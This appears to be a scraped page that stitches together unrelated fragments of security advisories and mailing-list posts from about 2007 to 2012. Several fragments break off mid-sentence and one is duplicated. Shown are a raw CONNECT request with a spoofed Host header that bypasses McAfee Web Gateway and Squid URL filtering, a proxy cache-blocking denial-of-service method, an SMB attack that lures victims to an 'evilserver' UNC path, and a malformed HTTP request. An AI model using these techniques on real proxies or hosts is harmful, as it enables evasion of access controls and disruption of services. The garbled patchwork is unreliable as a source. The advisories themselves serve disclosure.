Next Page >>
connection
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection
Advisory ID: cisco-sa-20120229-cuc
Revision 1.0
For Public Release 2012 February 29 16:00 UTC (GMT)
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAffee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
inaccessible by means of the prefetch cache control directive.
The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* TCP Connection Exhaustion Denial of Service Vulnerability
* Session Initiation Protocol (SIP) Inspection Denial of Service
Vulnerabilities
* Skinny Client Control Protocol (SCCP) Inspection Denial of
Service Vulnerability
* WebVPN Datagram Transport Layer Security (DTLS) Denial of Service
to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.
The vulnerability I called TNS Poison affects the component called TNS
Listener, which is the responsible of connections establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The “feature” exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).
Summary
=======
Cisco IOS Software Release, 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.
??
I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in :
1. comparing the HOST header to the host portion of the CONNECT URI
2. resolving either to a name or IP address (depending on its original state)
3. comparing the resolved results to each other (DNS RR records will be an interesting case)
The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:
In McAfee Web Gateway it is possible to convert GET methods in CONNECT
methods, and after the connection, send the same get packet, without
modification and without cryptography. Even with the get packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept.
I think it is a vulnerability!
See my python code.
Thanks
What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.
There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers
Hello,
We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.
- Vikram
On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes
A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.
Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.
The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.
You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.
The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.
Scope
Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism.
Findings
# CVE: CVE-2012-2212
I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
Date: 09.09.2009
________________________________________________________________________
Vendor: Microsoft Corporation
Product: Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity: Moderate
CVE: CVE-2009-1926
________________________________________________________________________
Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02550412
Version: 1
HPSBMA02593 SSRT100237 rev.1 - HP Virtual Connect Enterprise Manager (VCEM) for Windows, Remote Arbitrary File Download
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-10-21
Last Updated: 2010-10-21
exhaustive).
Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
All my research was made against a McAfee Web Gateway 7, and, after I
finished the proof of concept, I tested against Squid.
Both are vulnerable to SSL Translation Attack (converting hostnames to
IP). But Squid do not use the HOST field of HTTP protocol. But McAfee
uses it.
The latest default configuration of Squid blocks CONNECT methods for
all ports but 443. McAfee allows CONNECT for 80 and 443.
So the tests I made with Host header works ONLY for McAfee Web Gateway
and the translation of GET methods to CONNECT methods will work ONLY
for McAfee, because Squid blocks CONNECT for port 80. But, if the
proxy allows this kind of connection, the proxy can be vulnerable (for
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerabilty overview:
---------------
Cisco IOS Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, that could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.
Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.
This advisory is posted at
of other methods are CRAM-MD5 or DIGEST-MD5.
Example for the "port 25" service:
$ telnet server.example.com 25
Connected to server.example.com.
Escape character is '^]'.
220 server.example.com ESMTP Postfix
ehlo client.example.com
250-server.example.com
250-PIPELINING
# Tested on: Squid Proxy 3.1.19
# CVE: CVE-2012-2213
I found a vulnerability in Squid Proxy that allows access to filtered sites.
The software believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
actually required to access a specific site on multi-homed web sites.
When no host header is used, the intended web site is actually not
displayed. Therefore, there is no risk.
Macula's Analysis: If you dont have properly installed some AV, HIPS,
etc, through this vuln, a workstation can connect to a malicious
"Hacking Site" and get infected. Also through this vuln, you can
connect to different porn sites without problems. And no matter if its
or not multi-homed web sites. So we consider its not a low risk.
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
decrement feature enabled are vulnerable.
By default the PIX and ASA security appliance software does not
decrement the TTL of transient packets. The ability to decrement the TTL
of transient packets can be enabled on a selective or global basis by
using the set connection decrement-ttl command in the policy-map class
configuration mode. To determine whether you are running this feature
use the show running-config command and search for the set connection
decrement-ttl command. Alternatively you can use the include argument to
search for this command as follows:
decrement feature enabled are vulnerable.
By default the PIX and ASA security appliance software does not
decrement the TTL of transient packets. The ability to decrement the TTL
of transient packets can be enabled on a selective or global basis by
using the set connection decrement-ttl command in the policy-map class
configuration mode. To determine whether you are running this feature
use the show running-config command and search for the set connection
decrement-ttl command. Alternatively you can use the include argument to
search for this command as follows:
REQUEST:
GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
2. Cross-site Scripting vulnerability in
to overflow buffer on heap via integer overflow vulnerability.
Description:
Mod_proxy implements a proxy/cache for Apache. It implements proxying capability for FTP, CONNECT (for SSL),
HTTP/0.9, HTTP/1.0, and (as of Apache 1.3.23) HTTP/1.1. The module can be configured to connect to other
proxy modules for these and other protocols.
Details:
Next Page>>
|
